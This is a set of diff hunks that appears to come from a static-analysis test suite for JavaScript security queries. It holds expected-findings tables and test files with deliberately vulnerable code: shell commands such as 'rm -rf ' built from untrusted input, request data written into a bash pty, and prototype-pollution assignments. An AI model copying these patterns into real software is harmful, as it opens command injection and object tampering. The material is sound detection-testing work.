| lib/lib.js:69:10:69:47 | "for fo ... la end" | lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:69:2:69:48 | cp.exec ... a end") | shell command |
| lib/lib.js:71:10:71:31 | "cat /f ... + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:71:2:71:32 | cp.exec ... + name) | shell command |
| lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | lib/lib.js:64:41:64:44 | name | lib/lib.js:73:21:73:24 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | shell command |
| lib/lib.js:75:10:75:29 | "cat '" + name + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:75:20:75:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:75:2:75:30 | cp.exec ... + "'") | shell command |
@@ -742,6 +751,7 @@ edges
| lib/lib.js:149:12:149:27 | "rm -rf " + name | lib/lib.js:148:37:148:40 | name | lib/lib.js:149:24:149:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:148:37:148:40 | name | library input | lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | shell command |
| lib/lib.js:161:13:161:28 | "rm -rf " + name | lib/lib.js:155:38:155:41 | name | lib/lib.js:161:25:161:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:155:38:155:41 | name | library input | lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | shell command |
| lib/lib.js:173:10:173:23 | "fo \| " + name | lib/lib.js:170:41:170:44 | name | lib/lib.js:173:20:173:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:170:41:170:44 | name | library input | lib/lib.js:173:2:173:24 | cp.exec ... + name) | shell command |
| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | lib/lib.js:177:38:177:41 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command |
| lib/lib.js:182:10:182:27 | "rm -rf " + broken | lib/lib.js:177:38:177:41 | name | lib/lib.js:182:22:182:27 | broken | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command |
| lib/lib.js:187:10:187:25 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:187:2:187:26 | cp.exec ... + name) | shell command |
| lib/lib.js:190:11:190:26 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:190:23:190:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:190:3:190:27 | cp.exec ... + name) | shell command |


@@ -66,7 +66,7 @@ module.exports.stringConcat = function (name) {
cp.exec(name); // OK.
cp.exec("for foo in (" + name + ") do bla end"); // OK.
cp.exec("for foo in (" + name + ") do bla end"); // NOT OK.
cp.exec("cat /foO/BAR/" + name) // NOT OK.


@@ -84,6 +84,11 @@ nodes
| express.js:26:17:26:35 | req.param("wobble") |
| express.js:27:34:27:38 | taint |
| express.js:27:34:27:38 | taint |
| express.js:34:9:34:35 | taint |
| express.js:34:17:34:35 | req.param("wobble") |
| express.js:34:17:34:35 | req.param("wobble") |
| express.js:43:15:43:19 | taint |
| express.js:43:15:43:19 | taint |
| module.js:9:16:9:29 | req.query.code |
| module.js:9:16:9:29 | req.query.code |
| module.js:9:16:9:29 | req.query.code |
@@ -216,6 +221,10 @@ edges
| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint |
| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint |
| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint |
| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint |
| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint |
| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint |
| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint |
| module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code |
| module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code |
| react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted |
@@ -311,6 +320,7 @@ edges
| express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | This code execution depends on a $@. | express.js:19:37:19:70 | req.par ... odule") | user-provided value |
| express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:21:19:21:48 | req.par ... ntext") | user-provided value |
| express.js:27:34:27:38 | taint | express.js:26:17:26:35 | req.param("wobble") | express.js:27:34:27:38 | taint | This code execution depends on a $@. | express.js:26:17:26:35 | req.param("wobble") | user-provided value |
| express.js:43:15:43:19 | taint | express.js:34:17:34:35 | req.param("wobble") | express.js:43:15:43:19 | taint | This code execution depends on a $@. | express.js:34:17:34:35 | req.param("wobble") | user-provided value |
| module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | This code execution depends on a $@. | module.js:9:16:9:29 | req.query.code | user-provided value |
| module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | This code execution depends on a $@. | module.js:11:17:11:30 | req.query.code | user-provided value |
| react-native.js:8:32:8:38 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:32:8:38 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value |


@@ -88,6 +88,11 @@ nodes
| express.js:26:17:26:35 | req.param("wobble") |
| express.js:27:34:27:38 | taint |
| express.js:27:34:27:38 | taint |
| express.js:34:9:34:35 | taint |
| express.js:34:17:34:35 | req.param("wobble") |
| express.js:34:17:34:35 | req.param("wobble") |
| express.js:43:15:43:19 | taint |
| express.js:43:15:43:19 | taint |
| module.js:9:16:9:29 | req.query.code |
| module.js:9:16:9:29 | req.query.code |
| module.js:9:16:9:29 | req.query.code |
@@ -224,6 +229,10 @@ edges
| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint |
| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint |
| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint |
| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint |
| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint |
| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint |
| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint |
| module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code |
| module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code |
| react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted |


@@ -28,3 +28,18 @@ app.get('/other/path', function(req, res) {
cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); // OK
});
const pty = require('node-pty');
app.get('/terminal', function(req, res) {
const taint = req.param("wobble");
const shell = pty.spawn('bash', [], {
name: 'xterm-color',
cols: 80,
rows: 30,
cwd: process.env.HOME,
env: process.env
});
shell.write(taint); // NOT OK
});


@@ -15,3 +15,4 @@
| tst.js:20:3:20:57 | (<[a-z\\/!$]("[^"]*"\|'[^']*'\|[^'">])*>\|<!(--.*?--\\s*)+>) | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 3 and comments ending with --!> are matched with capture group 1. |
| tst.js:21:6:21:249 | <(?:(?:!--([\\w\\W]*?)-->)\|(?:!\\[CDATA\\[([\\w\\W]*?)\\]\\]>)\|(?:!DOCTYPE([\\w\\W]*?)>)\|(?:\\?([^\\s\\/<>]+) ?([\\w\\W]*?)[?/]>)\|(?:\\/([A-Za-z][A-Za-z0-9\\-_\\:\\.]*)>)\|(?:([A-Za-z][A-Za-z0-9\\-_\\:\\.]*)((?:\\s+[^"'>]+(?:(?:"[^"]*")\|(?:'[^']*')\|[^>]*))*\|\\/\|\\s+)>)) | This regular expression only parses --> (capture group 1) and not --!> as an HTML comment end tag. |
| tst.js:22:6:22:33 | <!--([\\w\\W]*?)-->\|<([^>]*?)> | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 1 and comments ending with --!> are matched with capture group 2. |
| tst.js:31:6:31:8 | --> | This regular expression only parses --> and not --!> as a HTML comment end tag. |


@@ -26,3 +26,10 @@ doFilters(filters)
var strip = '<script([^>]*)>([\\S\\s]*?)<\/script([^>]*)>'; // OK - it's used with the ignorecase flag
new RegExp(strip, 'gi');
var moreFilters = [
/-->/g, // NOT OK - doesn't match --!>
/^>|^->|<!--|-->|--!>|<!-$/g, // OK
];
doFilters(moreFilters);


@@ -1,18 +1,17 @@
var express = require('express');
var express = require("express");
var app = express();
// set up rate limiter: maximum of five requests per minute
var RateLimit = require('express-rate-limit');
var limiter = new RateLimit({
windowMs: 1*60*1000, // 1 minute
max: 5
var RateLimit = require("express-rate-limit");
var limiter = RateLimit({
windowMs: 1 * 60 * 1000, // 1 minute
max: 5,
});
// apply rate limiter to all requests
app.use(limiter);
app.get('/:path', function(req, res) {
app.get("/:path", function (req, res) {
let path = req.params.path;
if (isValidPath(path))
res.sendFile(path);
if (isValidPath(path)) res.sendFile(path);
});


@@ -117,6 +117,12 @@ nodes
| lib.js:128:9:128:20 | obj[path[0]] |
| lib.js:128:13:128:16 | path |
| lib.js:128:13:128:19 | path[0] |
| otherlib/src/otherlibimpl.js:1:37:1:40 | path |
| otherlib/src/otherlibimpl.js:1:37:1:40 | path |
| otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] |
| otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] |
| otherlib/src/otherlibimpl.js:2:7:2:10 | path |
| otherlib/src/otherlibimpl.js:2:7:2:13 | path[0] |
| sublib/other.js:5:28:5:31 | path |
| sublib/other.js:5:28:5:31 | path |
| sublib/other.js:6:7:6:18 | obj[path[0]] |
@@ -295,6 +301,11 @@ edges
| lib.js:128:13:128:16 | path | lib.js:128:13:128:19 | path[0] |
| lib.js:128:13:128:19 | path[0] | lib.js:128:9:128:20 | obj[path[0]] |
| lib.js:128:13:128:19 | path[0] | lib.js:128:9:128:20 | obj[path[0]] |
| otherlib/src/otherlibimpl.js:1:37:1:40 | path | otherlib/src/otherlibimpl.js:2:7:2:10 | path |
| otherlib/src/otherlibimpl.js:1:37:1:40 | path | otherlib/src/otherlibimpl.js:2:7:2:10 | path |
| otherlib/src/otherlibimpl.js:2:7:2:10 | path | otherlib/src/otherlibimpl.js:2:7:2:13 | path[0] |
| otherlib/src/otherlibimpl.js:2:7:2:13 | path[0] | otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] |
| otherlib/src/otherlibimpl.js:2:7:2:13 | path[0] | otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] |
| sublib/other.js:5:28:5:31 | path | sublib/other.js:6:11:6:14 | path |
| sublib/other.js:5:28:5:31 | path | sublib/other.js:6:11:6:14 | path |
| sublib/other.js:6:11:6:14 | path | sublib/other.js:6:11:6:17 | path[0] |
@@ -367,6 +378,7 @@ edges
| lib.js:108:3:108:10 | obj[one] | lib.js:104:13:104:21 | arguments | lib.js:108:3:108:10 | obj[one] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:104:13:104:21 | arguments | library input |
| lib.js:119:13:119:24 | obj[path[0]] | lib.js:118:29:118:32 | path | lib.js:119:13:119:24 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:118:29:118:32 | path | library input |
| lib.js:128:9:128:20 | obj[path[0]] | lib.js:127:14:127:17 | path | lib.js:128:9:128:20 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:127:14:127:17 | path | library input |
| otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | otherlib/src/otherlibimpl.js:1:37:1:40 | path | otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | otherlib/src/otherlibimpl.js:1:37:1:40 | path | library input |
| sublib/other.js:6:7:6:18 | obj[path[0]] | sublib/other.js:5:28:5:31 | path | sublib/other.js:6:7:6:18 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/other.js:5:28:5:31 | path | library input |
| sublib/sub.js:2:3:2:14 | obj[path[0]] | sublib/sub.js:1:37:1:40 | path | sublib/sub.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/sub.js:1:37:1:40 | path | library input |
| tst.js:8:5:8:17 | object[taint] | tst.js:5:24:5:37 | req.query.data | tst.js:8:5:8:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input |


@@ -0,0 +1,4 @@
{
"name": "otherlib",
"main": "dist/otherlibimpl.node.cjs.js"
}


@@ -0,0 +1,3 @@
module.exports.set = function (obj, path, value) {
obj[path[0]][path[1]] = value; // NOT OK
}